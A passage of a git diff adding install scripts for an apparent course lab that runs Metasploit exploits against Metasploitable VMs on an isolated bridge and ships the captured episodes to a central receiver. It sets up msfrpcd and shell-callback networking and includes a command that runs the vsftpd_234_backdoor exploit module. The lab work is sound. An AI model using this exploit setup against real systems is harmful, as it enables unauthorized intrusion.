curl -fL --retry 3 --retry-delay 5 -o "$ARCHIVE.partial" "$IMAGE_URL"
|
||||
mv "$ARCHIVE.partial" "$ARCHIVE"
|
||||
fi
|
||||
|
||||
log "verifying sha256"
|
||||
ACTUAL="$(sha256sum "$ARCHIVE" | awk '{print $1}')"
|
||||
if [[ "$ACTUAL" != "$IMAGE_SHA256" ]]; then
|
||||
die "sha256 mismatch: expected $IMAGE_SHA256, got $ACTUAL"
|
||||
fi
|
||||
log "sha256 ok"
|
||||
|
||||
# Extract — handle either zip or 7z, since various mirrors choose one
|
||||
# or the other.
|
||||
case "$ARCHIVE" in
|
||||
*.zip) ( cd "$WORK_DIR" && unzip -o "$ARCHIVE" ) ;;
|
||||
*.7z|*.7zip) command -v 7z >/dev/null || die "7z not installed"; \
|
||||
( cd "$WORK_DIR" && 7z x -y "$ARCHIVE" ) ;;
|
||||
*) die "unsupported archive type: $ARCHIVE" ;;
|
||||
esac
|
||||
|
||||
VMDK="$(find "$WORK_DIR" -name 'Metasploitable*.vmdk' -print -quit)"
|
||||
[[ -n "$VMDK" ]] || die "no Metasploitable*.vmdk in extracted archive"
|
||||
|
||||
log "converting $VMDK → qcow2"
|
||||
command -v qemu-img >/dev/null || die "qemu-img required (apt install qemu-utils)"
|
||||
qemu-img convert -O qcow2 "$VMDK" "$OUT_DIR/metasploitable2.qcow2"
|
||||
|
||||
log "done: $OUT_DIR/metasploitable2.qcow2"
|
||||
log "Tier-3 ready when msfrpcd is up. See scripts/install-msfrpcd.sh."
|
||||
234
scripts/install-lab-host.sh
Executable file
234
scripts/install-lab-host.sh
Executable file
|
|
@ -0,0 +1,234 @@
|
|||
#!/usr/bin/env bash
|
||||
# Install / refresh the CIS490 lab-host role.
|
||||
#
|
||||
# Idempotent — safe to re-run after `git pull`. Does NOT enroll the
|
||||
# host into WireGuard (that's wg-enroll's job, run separately and
|
||||
# *first*) and does NOT mint TLS certs (that's wg-pki's job).
|
||||
#
|
||||
# Steps:
|
||||
# 1. Verify prereqs (KVM, zstd, qemu, python3.11+, systemd).
|
||||
# 2. Create the cis490 service user + /var/lib/cis490 layout.
|
||||
# 3. Sync the repo into /opt/cis490 and build a uv-managed venv.
|
||||
# 4. Install systemd units from etc/.
|
||||
# 5. Drop /etc/cis490/lab-host.toml (only on first install).
|
||||
#
|
||||
# Operator finishes by:
|
||||
# - editing /etc/cis490/lab-host.toml (host_id, receiver URL, certs)
|
||||
# - placing leaf certs at /etc/cis490/certs/{lab-host.pem,key,wg-ca.pem}
|
||||
# - `systemctl enable --now cis490-shipper`
|
||||
|
||||
set -euo pipefail
|
||||
|
||||
REPO_ROOT="$(cd "$(dirname "$0")/.." && pwd)"
|
||||
INSTALL_ROOT="${INSTALL_ROOT:-/opt/cis490}"
|
||||
DATA_ROOT="${DATA_ROOT:-/var/lib/cis490}"
|
||||
ETC_ROOT="${ETC_ROOT:-/etc/cis490}"
|
||||
SERVICE_USER="${SERVICE_USER:-cis490}"
|
||||
|
||||
log() { printf '[install-lab-host] %s\n' "$*" >&2; }
|
||||
die() { log "FATAL: $*"; exit 1; }
|
||||
|
||||
# --- 1. prereqs --------------------------------------------------------
|
||||
log "checking prereqs"
|
||||
|
||||
if [[ $EUID -ne 0 ]]; then
|
||||
die "must run as root (writes to /opt, /etc, /var/lib, and systemd)"
|
||||
fi
|
||||
command -v systemctl >/dev/null || die "systemd not found"
|
||||
command -v qemu-system-x86_64 >/dev/null || die "qemu-system-x86_64 not on PATH"
|
||||
command -v zstd >/dev/null || die "zstd not on PATH (apt install zstd)"
|
||||
[[ -e /dev/kvm ]] || die "/dev/kvm missing — KVM not available"
|
||||
|
||||
# uv is preferred (lockfile-driven). Fall back to system pip if absent.
|
||||
USE_UV=0
|
||||
if command -v uv >/dev/null; then USE_UV=1; fi
|
||||
|
||||
# --- 2. user + layout --------------------------------------------------
|
||||
log "ensuring service user $SERVICE_USER"
|
||||
if ! id -u "$SERVICE_USER" >/dev/null 2>&1; then
|
||||
useradd --system --no-create-home --shell /usr/sbin/nologin \
|
||||
--home-dir "$INSTALL_ROOT" "$SERVICE_USER"
|
||||
fi
|
||||
# kvm group lets the service spawn VMs.
|
||||
if getent group kvm >/dev/null 2>&1; then
|
||||
usermod -a -G kvm "$SERVICE_USER" || true
|
||||
fi
|
||||
|
||||
install -d -o root -g root -m 0755 "$ETC_ROOT" "$ETC_ROOT/certs"
|
||||
install -d -o "$SERVICE_USER" -g "$SERVICE_USER" -m 0755 \
|
||||
"$DATA_ROOT" "$DATA_ROOT/data" \
|
||||
"$DATA_ROOT/data/episodes" "$DATA_ROOT/data/outbox" \
|
||||
"$DATA_ROOT/data/shipped" "$DATA_ROOT/data/queue" \
|
||||
"$DATA_ROOT/samples" "$DATA_ROOT/samples/store" \
|
||||
"$DATA_ROOT/vm" "$DATA_ROOT/vm/images"
|
||||
|
||||
# --- 3. repo + venv ----------------------------------------------------
|
||||
log "syncing repo into $INSTALL_ROOT"
|
||||
install -d -o "$SERVICE_USER" -g "$SERVICE_USER" -m 0755 "$INSTALL_ROOT"
|
||||
# We use a clean cp -aT rather than rsync to avoid an extra dep.
|
||||
cp -aT "$REPO_ROOT" "$INSTALL_ROOT"
|
||||
chown -R "$SERVICE_USER":"$SERVICE_USER" "$INSTALL_ROOT"
|
||||
|
||||
log "building venv"
|
||||
if [[ "$USE_UV" -eq 1 ]]; then
|
||||
sudo -u "$SERVICE_USER" -- env HOME="$INSTALL_ROOT" \
|
||||
uv sync --project "$INSTALL_ROOT"
|
||||
else
|
||||
sudo -u "$SERVICE_USER" -- python3 -m venv "$INSTALL_ROOT/.venv"
|
||||
sudo -u "$SERVICE_USER" -- "$INSTALL_ROOT/.venv/bin/pip" install \
|
||||
--quiet --upgrade pip
|
||||
sudo -u "$SERVICE_USER" -- "$INSTALL_ROOT/.venv/bin/pip" install \
|
||||
--quiet starlette 'uvicorn[standard]' httpx msgpack
|
||||
fi
|
||||
|
||||
# --- 4. systemd --------------------------------------------------------
|
||||
log "installing systemd units"
|
||||
install -m 0644 "$REPO_ROOT/etc/cis490-shipper.service" \
|
||||
/etc/systemd/system/cis490-shipper.service
|
||||
install -m 0644 "$REPO_ROOT/etc/cis490-orchestrator.service" \
|
||||
/etc/systemd/system/cis490-orchestrator.service
|
||||
systemctl daemon-reload
|
||||
|
||||
# --- 5. config template (only on first install) -----------------------
|
||||
if [[ ! -f "$ETC_ROOT/lab-host.toml" ]]; then
|
||||
log "writing $ETC_ROOT/lab-host.toml (template)"
|
||||
install -m 0640 -o root -g "$SERVICE_USER" \
|
||||
"$REPO_ROOT/etc/lab-host.toml.example" "$ETC_ROOT/lab-host.toml"
|
||||
NEW_INSTALL=1
|
||||
else
|
||||
log "$ETC_ROOT/lab-host.toml exists; leaving in place"
|
||||
NEW_INSTALL=0
|
||||
fi
|
||||
|
||||
# --- 6. orchestrator env file (read by cis490-orchestrator.service) ----
|
||||
ENV_FILE="$ETC_ROOT/lab-host.env"
|
||||
DEFAULT_HOST_ID="$(hostname -s)"
|
||||
if [[ ! -f "$ENV_FILE" ]]; then
|
||||
log "writing $ENV_FILE (host_id defaults to $DEFAULT_HOST_ID — edit if you want something else)"
|
||||
install -m 0640 -o root -g "$SERVICE_USER" /dev/stdin "$ENV_FILE" <<EOF
|
||||
# Read by cis490-orchestrator.service. Override per-host as needed.
|
||||
FLEET_HOST_ID=$DEFAULT_HOST_ID
|
||||
# BRIDGE=br-malware enables source 4 pcap capture AND unlocks the
|
||||
# Tier-3 modules whose payloads need callback (reverse/bind shells).
|
||||
# install-lab-host.sh provisions the bridge + tap pool below; leave
|
||||
# this on unless your lab host can't run NETLINK ops.
|
||||
BRIDGE=br-malware
|
||||
EOF
|
||||
fi
|
||||
|
||||
# --- 6b. host-only bridge + per-slot tap pool --------------------------
|
||||
# br-malware lets pcap capture the guest traffic and lets bind/reverse
|
||||
# shell payloads route between guest and host. We pre-create a small
|
||||
# pool of taps so the launchers don't need sudo to attach interfaces;
|
||||
# each slot uses cis490tap{SLOT,SLOT+100} (Tier-2 demo + Tier-3
|
||||
# target). Idempotent: re-running on an already-set-up host is a
|
||||
# no-op.
|
||||
if command -v ip >/dev/null && [[ -x "$REPO_ROOT/vm/setup_bridge.sh" ]]; then
|
||||
if "$REPO_ROOT/vm/setup_bridge.sh" >/dev/null 2>&1; then
|
||||
log "bridge br-malware ready"
|
||||
for n in 0 1 2 3 4 5 6 7; do
|
||||
for prefix in cis490tap cis490target; do
|
||||
tap="${prefix}${n}"
|
||||
if ! ip link show "$tap" >/dev/null 2>&1; then
|
||||
ip tuntap add dev "$tap" mode tap user "$SERVICE_USER" 2>/dev/null || \
|
||||
ip tuntap add dev "$tap" mode tap 2>/dev/null || true
|
||||
ip link set "$tap" master br-malware 2>/dev/null || true
|
||||
ip link set "$tap" up 2>/dev/null || true
|
||||
fi
|
||||
done
|
||||
done
|
||||
log "tap pool: cis490tap0..7 + cis490target0..7 attached to br-malware"
|
||||
else
|
||||
log "WARN: setup_bridge.sh failed; BRIDGE mode will be unavailable"
|
||||
# Comment out BRIDGE in the env file — fleet will still run
|
||||
# Tier-2 + non-callback Tier-3 modules.
|
||||
sed -i 's/^BRIDGE=br-malware/# BRIDGE=br-malware # auto-disabled: bridge setup failed/' "$ENV_FILE"
|
||||
fi
|
||||
fi
|
||||
|
||||
# --- 7. mTLS leaf cert (auto-fetch via bootstrap.wg) -------------------
|
||||
# Pull our leaf cert from the Pi's bootstrap endpoint if it isn't
|
||||
# already on disk. Trust boundary: "reached bootstrap.wg over WG"
|
||||
# (iptmonads already filters non-peers from 443). Caddy's TLS cert
|
||||
# is verified against the bundled etc/caddy-root.crt — no chicken-
|
||||
# and-egg.
|
||||
HOST_ID="$(grep -E '^host_id\s*=' "$ETC_ROOT/lab-host.toml" 2>/dev/null \
|
||||
| head -1 | sed -E 's/^host_id\s*=\s*"([^"]+)".*/\1/')"
|
||||
if [[ -z "$HOST_ID" || "$HOST_ID" == "REPLACE_ME" ]]; then
|
||||
log "skipping cert auto-fetch: host_id not set in $ETC_ROOT/lab-host.toml"
|
||||
elif [[ ! -f "$ETC_ROOT/certs/lab-host.pem" ]]; then
|
||||
log "fetching leaf cert from https://bootstrap.wg/v1/cert/$HOST_ID"
|
||||
install -d -m 0755 -o root -g "$SERVICE_USER" "$ETC_ROOT/certs"
|
||||
TAR="/tmp/cis490-bootstrap-$$.tar"
|
||||
if curl -fsS --cacert "$REPO_ROOT/etc/caddy-root.crt" \
|
||||
--connect-timeout 10 --max-time 60 \
|
||||
"https://bootstrap.wg/v1/cert/$HOST_ID" -o "$TAR"; then
|
||||
tar -C "$ETC_ROOT/certs" -xf "$TAR"
|
||||
mv "$ETC_ROOT/certs/ca.crt" "$ETC_ROOT/certs/wg-ca.pem"
|
||||
mv "$ETC_ROOT/certs/$HOST_ID.pem" "$ETC_ROOT/certs/lab-host.pem"
|
||||
mv "$ETC_ROOT/certs/$HOST_ID.key" "$ETC_ROOT/certs/lab-host.key"
|
||||
chown root:"$SERVICE_USER" "$ETC_ROOT/certs/"*.pem \
|
||||
"$ETC_ROOT/certs/lab-host.key"
|
||||
chmod 0644 "$ETC_ROOT/certs/"*.pem
|
||||
chmod 0640 "$ETC_ROOT/certs/lab-host.key"
|
||||
rm -f "$TAR"
|
||||
log "leaf cert installed for host_id=$HOST_ID"
|
||||
else
|
||||
rm -f "$TAR"
|
||||
log "WARN: bootstrap.wg fetch failed — make sure /etc/hosts maps it"
|
||||
log " to 10.100.0.1 and that wg0 is up. cert delivery skipped."
|
||||
fi
|
||||
else
|
||||
log "$ETC_ROOT/certs/lab-host.pem present; skipping auto-fetch"
|
||||
fi
|
||||
|
||||
# --- 8. baseline VM image + cidata (best-effort) -----------------------
|
||||
ALPINE_IMG="$DATA_ROOT/vm/images/alpine-baseline.qcow2"
|
||||
CIDATA_ISO="$DATA_ROOT/vm/images/cidata.iso"
|
||||
if [[ ! -f "$ALPINE_IMG" ]]; then
|
||||
if "$REPO_ROOT/scripts/fetch-alpine-baseline.sh" "$ALPINE_IMG"; then
|
||||
log "fetched Alpine baseline -> $ALPINE_IMG"
|
||||
else
|
||||
log "WARN: Alpine baseline fetch failed; drop a qcow2 at $ALPINE_IMG manually"
|
||||
fi
|
||||
fi
|
||||
if [[ -f "$ALPINE_IMG" && ! -f "$CIDATA_ISO" ]]; then
|
||||
log "building cidata.iso (in-guest agent embedded)"
|
||||
sudo -u "$SERVICE_USER" -- "$INSTALL_ROOT/.venv/bin/python" \
|
||||
"$INSTALL_ROOT/tools/build_cidata.py" "$CIDATA_ISO" || \
|
||||
log "WARN: cidata build failed; run tools/build_cidata.py manually"
|
||||
fi
|
||||
# Symlink the canonical paths the launchers look at, when missing.
|
||||
ln -sf "$ALPINE_IMG" "$INSTALL_ROOT/vm/images/alpine-baseline.qcow2" 2>/dev/null || true
|
||||
ln -sf "$CIDATA_ISO" "$INSTALL_ROOT/vm/images/cidata.iso" 2>/dev/null || true
|
||||
|
||||
if [[ "$NEW_INSTALL" == "1" ]]; then
|
||||
log ""
|
||||
log "================================================================="
|
||||
log " FIRST-INSTALL NEXT STEPS "
|
||||
log "================================================================="
|
||||
log " 1. Edit $ETC_ROOT/lab-host.toml — set host_id and receiver URL."
|
||||
log ""
|
||||
log " 2. (On the Pi.) Mint + ship a leaf cert for this host:"
|
||||
log " sudo wg-pki/scripts/deploy-cis490-cert.sh <host_id> <wg_ip>"
|
||||
log ""
|
||||
log " 3. Run the diagnostic — every red row prints the exact fix:"
|
||||
log " $INSTALL_ROOT/.venv/bin/python \\"
|
||||
log " $INSTALL_ROOT/tools/cis490_doctor.py --role lab-host"
|
||||
log ""
|
||||
log " 4. Smoke-test the pipe (returns ok=true on success):"
|
||||
log " sudo -u $SERVICE_USER $INSTALL_ROOT/.venv/bin/python -m shipper \\"
|
||||
log " --config $ETC_ROOT/lab-host.toml --ping"
|
||||
log ""
|
||||
log " 5. Turn on the services — episodes start flowing immediately:"
|
||||
log " sudo systemctl enable --now cis490-shipper cis490-orchestrator"
|
||||
log "================================================================="
|
||||
fi
|
||||
|
||||
log "lab-host install complete."
|
||||
log ""
|
||||
log "Cloning this repo and running the launchers manually is NOT enough."
|
||||
log "The lab-host role's data flow lives in the systemd services this"
|
||||
log "script just installed. If $INSTALL_ROOT/index.jsonl on the Pi stays"
|
||||
log "empty after step 5, run:"
|
||||
log " $INSTALL_ROOT/.venv/bin/python $INSTALL_ROOT/tools/cis490_doctor.py"
|
||||
124
scripts/install-msfrpcd.sh
Executable file
124
scripts/install-msfrpcd.sh
Executable file
|
|
@ -0,0 +1,124 @@
|
|||
#!/usr/bin/env bash
|
||||
# Install + configure ``msfrpcd`` for the Tier-3 exploit driver.
|
||||
#
|
||||
# Idempotent: re-running on a host that already has msfrpcd refreshes
|
||||
# the systemd unit and credentials but doesn't reinstall the framework.
|
||||
#
|
||||
# Steps:
|
||||
# 1. Install metasploit-framework via the host package manager (or
|
||||
# report the right one-liner for that distro). Big download —
|
||||
# ~1 GiB and several minutes.
|
||||
# 2. Generate a strong password and store at /etc/cis490/msfrpc.env
|
||||
# (mode 0640, owner root:cis490).
|
||||
# 3. Drop /etc/systemd/system/cis490-msfrpcd.service that runs
|
||||
# msfrpcd bound to 127.0.0.1:55553 with the generated password.
|
||||
# 4. Enable + start.
|
||||
#
|
||||
# After this runs, ``MSFRPC_PASSWORD=$(. /etc/cis490/msfrpc.env;
|
||||
# echo $MSFRPC_PASSWORD)`` makes tools/run_tier3_demo.py work zero-touch.
|
||||
|
||||
set -euo pipefail
|
||||
|
||||
ETC_ROOT="/etc/cis490"
|
||||
ENV_FILE="$ETC_ROOT/msfrpc.env"
|
||||
UNIT="/etc/systemd/system/cis490-msfrpcd.service"
|
||||
PORT="${MSFRPC_PORT:-55553}"
|
||||
USER_NAME="${MSFRPC_USER:-msf}"
|
||||
|
||||
log() { printf '[install-msfrpcd] %s\n' "$*" >&2; }
|
||||
die() { log "FATAL: $*"; exit 1; }
|
||||
|
||||
[[ $EUID -eq 0 ]] || die "must run as root"
|
||||
command -v systemctl >/dev/null || die "systemd not found"
|
||||
|
||||
# --- 1. install metasploit-framework -----------------------------------
|
||||
if ! command -v msfrpcd >/dev/null; then
|
||||
log "msfrpcd not found; installing metasploit-framework"
|
||||
if command -v apt-get >/dev/null; then
|
||||
# The Debian/Ubuntu metasploit-framework package isn't in
|
||||
# the default repos for most distros. Use Rapid7's official
|
||||
# nightly installer when available.
|
||||
if [[ ! -x /opt/metasploit-framework/bin/msfrpcd ]]; then
|
||||
log "fetching Rapid7 nightly installer"
|
||||
curl -fsSL https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb \
|
||||
-o /tmp/msfinstall.sh || true
|
||||
log "automated install not available — install manually:"
|
||||
log " https://docs.metasploit.com/docs/using-metasploit/getting-started/nightly-installers.html"
|
||||
die "rerun once msfrpcd is on PATH"
|
||||
fi
|
||||
# Symlink the wrapper so ``msfrpcd`` is on PATH.
|
||||
ln -sf /opt/metasploit-framework/bin/msfrpcd /usr/local/bin/msfrpcd
|
||||
elif command -v pacman >/dev/null; then
|
||||
log "pacman -S metasploit"
|
||||
pacman -Sy --noconfirm metasploit
|
||||
elif command -v dnf >/dev/null; then
|
||||
die "Fedora/RHEL: install metasploit-framework manually, then re-run"
|
||||
else
|
||||
die "unknown package manager — install metasploit-framework manually"
|
||||
fi
|
||||
fi
|
||||
|
||||
command -v msfrpcd >/dev/null || die "msfrpcd still missing after install attempt"
|
||||
|
||||
# --- 2. generate password ----------------------------------------------
|
||||
install -d -m 0755 -o root -g root "$ETC_ROOT"
|
||||
if ! id -u cis490 >/dev/null 2>&1; then
|
||||
useradd --system --no-create-home --shell /usr/sbin/nologin cis490
|
||||
fi
|
||||
if [[ ! -f "$ENV_FILE" ]]; then
|
||||
log "generating msfrpc password"
|
||||
PW="$(openssl rand -base64 24 | tr -d '/+=' | head -c 32)"
|
||||
install -m 0640 -o root -g cis490 /dev/stdin "$ENV_FILE" <<EOF
|
||||
# Auto-generated by install-msfrpcd.sh — do not edit.
|
||||
MSFRPC_HOST=127.0.0.1
|
||||
MSFRPC_PORT=$PORT
|
||||
MSFRPC_USER=$USER_NAME
|
||||
MSFRPC_PASSWORD=$PW
|
||||
EOF
|
||||
else
|
||||
log "$ENV_FILE exists; preserving existing password"
|
||||
fi
|
||||
|
||||
# --- 3. systemd unit ----------------------------------------------------
|
||||
log "installing systemd unit"
|
||||
cat > "$UNIT" <<EOF
|
||||
[Unit]
|
||||
Description=CIS490 — Metasploit RPC daemon (loopback only)
|
||||
Documentation=https://maxgit.wg/spectral/CIS490
|
||||
After=network-online.target
|
||||
Wants=network-online.target
|
||||
|
||||
[Service]
|
||||
Type=simple
|
||||
EnvironmentFile=$ENV_FILE
|
||||
# msfrpcd flags:
|
||||
# -P <pw> password
|
||||
# -U <user> username
|
||||
# -a <ip> bind address (loopback only — Tier-3 driver runs locally)
|
||||
# -p <port> port
|
||||
# -f foreground (no daemonization, so systemd manages PID)
|
||||
ExecStart=/usr/bin/env msfrpcd -P \${MSFRPC_PASSWORD} -U \${MSFRPC_USER} -a 127.0.0.1 -p \${MSFRPC_PORT} -f
|
||||
Restart=on-failure
|
||||
RestartSec=5
|
||||
NoNewPrivileges=true
|
||||
PrivateTmp=true
|
||||
ProtectSystem=full
|
||||
ProtectHome=true
|
||||
|
||||
[Install]
|
||||
WantedBy=multi-user.target
|
||||
EOF
|
||||
|
||||
systemctl daemon-reload
|
||||
systemctl enable --now cis490-msfrpcd
|
||||
|
||||
# --- 4. final smoke -----------------------------------------------------
|
||||
sleep 2
|
||||
if ! ss -ltn 2>/dev/null | grep -q ":$PORT"; then
|
||||
log "WARN: nothing listening on 127.0.0.1:$PORT yet — check"
|
||||
log " journalctl -u cis490-msfrpcd"
|
||||
fi
|
||||
|
||||
log "done. To run a Tier-3 episode:"
|
||||
log " set -a; . $ENV_FILE; set +a"
|
||||
log " python tools/run_tier3_demo.py --module vsftpd_234_backdoor"
|
||||
112
scripts/install-receiver.sh
Executable file
112
scripts/install-receiver.sh
Executable file
|
|
@ -0,0 +1,112 @@
|
|||
#!/usr/bin/env bash
|
||||
# Install / refresh the CIS490 receiver role on the central WG node
|
||||
# (the Pi5 in our setup). Idempotent — safe to re-run.
|
||||
#
|
||||
# Steps:
|
||||
# 1. Verify prereqs (python3.11+, systemd).
|
||||
# 2. Create the cis490 service user + /var/lib/cis490 layout.
|
||||
# 3. Sync the repo into /opt/cis490 and build a venv.
|
||||
# 4. Install cis490-receiver.service.
|
||||
# 5. Drop /etc/cis490/receiver.toml on first install.
|
||||
#
|
||||
# This script does NOT:
|
||||
# - configure Caddy. Add a `collector.wg` block to your spectral/caddy
|
||||
# config to terminate TLS and reverse-proxy to 127.0.0.1:8443.
|
||||
# - issue server / client certs. wg-pki owns CA + leaf issuance.
|
||||
# - open firewall ports. iptmonads owns the WG-side ruleset.
|
||||
|
||||
set -euo pipefail
|
||||
|
||||
REPO_ROOT="$(cd "$(dirname "$0")/.." && pwd)"
|
||||
INSTALL_ROOT="${INSTALL_ROOT:-/opt/cis490}"
|
||||
DATA_ROOT="${DATA_ROOT:-/var/lib/cis490}"
|
||||
ETC_ROOT="${ETC_ROOT:-/etc/cis490}"
|
||||
SERVICE_USER="${SERVICE_USER:-cis490}"
|
||||
|
||||
log() { printf '[install-receiver] %s\n' "$*" >&2; }
|
||||
die() { log "FATAL: $*"; exit 1; }
|
||||
|
||||
# --- 1. prereqs --------------------------------------------------------
|
||||
log "checking prereqs"
|
||||
if [[ $EUID -ne 0 ]]; then
|
||||
die "must run as root"
|
||||
fi
|
||||
command -v systemctl >/dev/null || die "systemd not found"
|
||||
command -v python3 >/dev/null || die "python3 not on PATH"
|
||||
|
||||
PY_VER="$(python3 -c 'import sys; print(f"{sys.version_info.major}.{sys.version_info.minor}")')"
|
||||
if ! python3 -c 'import sys; sys.exit(0 if sys.version_info >= (3,11) else 1)'; then
|
||||
die "python >=3.11 required, found $PY_VER"
|
||||
fi
|
||||
|
||||
USE_UV=0
|
||||
if command -v uv >/dev/null; then USE_UV=1; fi
|
||||
|
||||
# --- 2. user + layout --------------------------------------------------
|
||||
log "ensuring service user $SERVICE_USER"
|
||||
if ! id -u "$SERVICE_USER" >/dev/null 2>&1; then
|
||||
useradd --system --no-create-home --shell /usr/sbin/nologin \
|
||||
--home-dir "$INSTALL_ROOT" "$SERVICE_USER"
|
||||
fi
|
||||
|
||||
install -d -o root -g root -m 0755 "$ETC_ROOT" "$ETC_ROOT/certs"
|
||||
install -d -o "$SERVICE_USER" -g "$SERVICE_USER" -m 0755 \
|
||||
"$DATA_ROOT" "$DATA_ROOT/episodes" "$DATA_ROOT/incoming"
|
||||
install -d -o "$SERVICE_USER" -g "$SERVICE_USER" -m 0750 "$DATA_ROOT"
|
||||
# Pre-create the index file so the first PUT doesn't race on creation.
|
||||
sudo -u "$SERVICE_USER" -- touch "$DATA_ROOT/index.jsonl"
|
||||
|
||||
# --- 3. repo + venv ----------------------------------------------------
|
||||
log "syncing repo into $INSTALL_ROOT"
|
||||
install -d -o "$SERVICE_USER" -g "$SERVICE_USER" -m 0755 "$INSTALL_ROOT"
|
||||
cp -aT "$REPO_ROOT" "$INSTALL_ROOT"
|
||||
chown -R "$SERVICE_USER":"$SERVICE_USER" "$INSTALL_ROOT"
|
||||
|
||||
log "building venv"
|
||||
if [[ "$USE_UV" -eq 1 ]]; then
|
||||
sudo -u "$SERVICE_USER" -- env HOME="$INSTALL_ROOT" \
|
||||
uv sync --project "$INSTALL_ROOT"
|
||||
else
|
||||
sudo -u "$SERVICE_USER" -- python3 -m venv "$INSTALL_ROOT/.venv"
|
||||
sudo -u "$SERVICE_USER" -- "$INSTALL_ROOT/.venv/bin/pip" install \
|
||||
--quiet --upgrade pip
|
||||
sudo -u "$SERVICE_USER" -- "$INSTALL_ROOT/.venv/bin/pip" install \
|
||||
--quiet starlette 'uvicorn[standard]'
|
||||
fi
|
||||
|
||||
# --- 4. systemd --------------------------------------------------------
|
||||
log "installing systemd units (receiver + bootstrap)"
|
||||
install -m 0644 "$REPO_ROOT/etc/cis490-receiver.service" \
|
||||
/etc/systemd/system/cis490-receiver.service
|
||||
install -m 0644 "$REPO_ROOT/etc/cis490-bootstrap.service" \
|
||||
/etc/systemd/system/cis490-bootstrap.service
|
||||
systemctl daemon-reload
|
||||
|
||||
# --- 5. config template (only on first install) -----------------------
|
||||
if [[ ! -f "$ETC_ROOT/receiver.toml" ]]; then
|
||||
log "writing $ETC_ROOT/receiver.toml (template)"
|
||||
install -m 0640 -o root -g "$SERVICE_USER" \
|
||||
"$REPO_ROOT/etc/receiver.toml.example" "$ETC_ROOT/receiver.toml"
|
||||
log ""
|
||||
log "FIRST-INSTALL NEXT STEPS:"
|
||||
log " 1. Verify $ETC_ROOT/receiver.toml paths."
|
||||
log " 2. Add a collector.wg block to your spectral/caddy config."
|
||||
log " Example:"
|
||||
log " collector.wg {"
|
||||
log " tls internal"
|
||||
log " reverse_proxy 127.0.0.1:8443"
|
||||
log " }"
|
||||
log " (mTLS to clients is enforced by the wg-pki CA bundle on"
|
||||
log " the receiver side once leaf certs are issued.)"
|
||||
log " 3. Open the WG-side port via iptmonads."
|
||||
log " 4. systemctl enable --now cis490-receiver cis490-bootstrap"
|
||||
log " 5. From a lab host: cis490-shipper --ping"
|
||||
log ""
|
||||
log "Bootstrap endpoint (cis490-bootstrap on :8446 + Caddy bootstrap.wg)"
|
||||
log "lets enrolled lab hosts auto-fetch their leaf certs. Without it,"
|
||||
log "operators have to hand-carry tarballs via deploy-cis490-cert.sh."
|
||||
else
|
||||
log "$ETC_ROOT/receiver.toml exists; leaving in place"
|
||||
fi
|
||||
|
||||
log "receiver install complete."
|
||||
50
scripts/issue-cis490-client-cert-wrapper.sh
Executable file
50
scripts/issue-cis490-client-cert-wrapper.sh
Executable file
|
|
@ -0,0 +1,50 @@
|
|||
#!/usr/bin/env bash
|
||||
# Wrapper that re-points the wg-pki issuer script's relative-path
|
||||
# assumption (PWD-derived publish dir, $REPO_ROOT/issued/) to the
|
||||
# absolute /var/lib/wg-pki/issued/ that the bootstrap service uses.
|
||||
#
|
||||
# wg-pki ships the actual issuer at
|
||||
# /home/max/.env/wg-pki/scripts/issue-cis490-client-cert.sh, which
|
||||
# computes paths relative to its own location. This wrapper sets
|
||||
# WG_PKI_STATE so the CA key is found in /var/lib/wg-pki, and forces
|
||||
# --out-dir to a path under /var/lib so cis490-bootstrap (with
|
||||
# ProtectHome=tmpfs) can write the resulting tarballs.
|
||||
|
||||
set -euo pipefail
|
||||
|
||||
# Resolve issuer path: prefer the install-time copy at /opt/wg-pki/,
|
||||
# fall back to whatever wg-pki clone the operator has under /home.
|
||||
ISSUER="${WG_PKI_ISSUER:-}"
|
||||
if [[ -z "$ISSUER" ]]; then
|
||||
for cand in \
|
||||
/opt/wg-pki/scripts/issue-cis490-client-cert.sh \
|
||||
/home/max/wg-pki/scripts/issue-cis490-client-cert.sh \
|
||||
/home/max/.env/wg-pki/scripts/issue-cis490-client-cert.sh; do
|
||||
if [[ -x "$cand" ]]; then ISSUER="$cand"; break; fi
|
||||
done
|
||||
fi
|
||||
if [[ -z "$ISSUER" || ! -x "$ISSUER" ]]; then
|
||||
echo "wrapper: no issue-cis490-client-cert.sh found; tried /opt/wg-pki, /home/max/wg-pki, /home/max/.env/wg-pki" >&2
|
||||
exit 2
|
||||
fi
|
||||
OUT_ROOT="/var/lib/wg-pki/issued"
|
||||
|
||||
if [[ $# -lt 1 ]]; then
|
||||
echo "usage: $0 <host_id> [--out-dir DIR] [--days N]" >&2
|
||||
exit 2
|
||||
fi
|
||||
|
||||
HOST_ID="$1"; shift
|
||||
|
||||
# Pull off any --out-dir already passed; we override.
|
||||
EXTRA=()
|
||||
while [[ $# -gt 0 ]]; do
|
||||
case "$1" in
|
||||
--out-dir) shift 2 ;; # drop, we set it ourselves
|
||||
*) EXTRA+=("$1"); shift ;;
|
||||
esac
|
||||
done
|
||||
|
||||
mkdir -p "$OUT_ROOT/$HOST_ID"
|
||||
exec env WG_PKI_STATE=/var/lib/wg-pki \
|
||||
"$ISSUER" "$HOST_ID" --out-dir "$OUT_ROOT/$HOST_ID" "${EXTRA[@]}"
|
||||
0
shipper/__init__.py
Normal file
0
shipper/__init__.py
Normal file
106
shipper/__main__.py
Normal file
106
shipper/__main__.py
Normal file
|
|
@ -0,0 +1,106 @@
|
|||
"""``cis490-shipper`` CLI entrypoint.
|
||||
|
||||
Modes:
|
||||
|
||||
--ping hit /v1/ping; exit 0 if 200/ok, non-zero otherwise.
|
||||
No tarball flow; index.jsonl on the receiver is untouched.
|
||||
--once one scan pass over data/episodes/, ship anything done, exit.
|
||||
(default) long-running daemon; rescans every scan_interval_s.
|
||||
"""
|
||||
|
||||
from __future__ import annotations
|
||||
|
||||
import argparse
|
||||
import json
|
||||
import logging
|
||||
import signal
|
||||
import sys
|
||||
from pathlib import Path
|
||||
|
||||
from .config import ShipperConfig
|
||||
from .queue import ShipperQueue
|
||||
from .transport import ShipperTransport
|
||||
|
||||
|
||||
def _setup_logging(level: str) -> None:
|
||||
logging.basicConfig(
|
||||
level=getattr(logging, level.upper(), logging.INFO),
|
||||
format="%(asctime)s %(levelname)s %(name)s %(message)s",
|
||||
)
|
||||
|
||||
|
||||
def main(argv: list[str] | None = None) -> int:
|
||||
parser = argparse.ArgumentParser(prog="cis490-shipper")
|
||||
parser.add_argument(
|
||||
"--config",
|
||||
default="/etc/cis490/lab-host.toml",
|
||||
help="Path to lab-host config (TOML)",
|
||||
)
|
||||
parser.add_argument(
